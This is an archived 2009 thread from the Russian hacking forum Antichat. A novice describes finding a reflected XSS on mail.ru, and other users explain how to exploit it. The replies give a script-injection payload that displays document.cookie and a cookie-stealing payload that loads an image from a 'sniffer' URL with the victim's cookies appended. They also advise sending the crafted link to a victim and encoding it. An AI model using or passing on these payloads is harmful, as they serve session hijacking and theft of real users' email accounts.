Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   пассивная xss на mail.ru, вопрос (https://forum.antichat.xyz/showthread.php?t=109833)

Seshh 08.03.2009 03:02

пассивная xss на mail.ru, вопрос
 
Я тут лазил по mail.ru искал XSS, вылитило следующее окно. На то, что было забито в скрипт как предупреждение это не похоже. Так, что это кто нить знает ?

http://img12.imageshack.us/img12/7390/111jcm.th.jpg

-m0rgan- 08.03.2009 03:10

>>Так, что это кто нить знает ?
пасвная XSS

Seshh 08.03.2009 03:21

Скрипт следующий: "><script>alert(XSS)</script>, а выскочела такая бойда почему ?

-m0rgan- 08.03.2009 03:27

ты чет напутал!
или скрипт нетот пихнул и незаметил...
То что на картинке - результат действия следуйщего скриптк:
Код:

"><script>alert(document.cookie)</script>

Seshh 08.03.2009 03:33

Блин, да ты прав я именно этим скриптом и пробовал.
А через эту уизвимость куки можно пробивать ?

needle 08.03.2009 03:36

просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>

Failure 08.03.2009 03:36

мочишь xD, искать xss и даже не знать что это и как заюзать, тебе сюда
ну раз спросил то отвечу - да, угнать кукисы можно

-m0rgan- 08.03.2009 03:38

Цитата:

Сообщение от needle
просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>

и что?

она посмотрит на свои куки=///////

ТС
кидаеш жертве линк с яваскриптом в котором будет (сниффер+document.cookie)
и жди куки)
например что то типа:
'><script>img = new Image();img.src="снифферкартинко"+d ocument.cookie;</script>

Seshh 08.03.2009 03:38

Спасибо, я тока учусь ))

[dei] 08.03.2009 03:40

только закодировать не забудь


Время: 16:31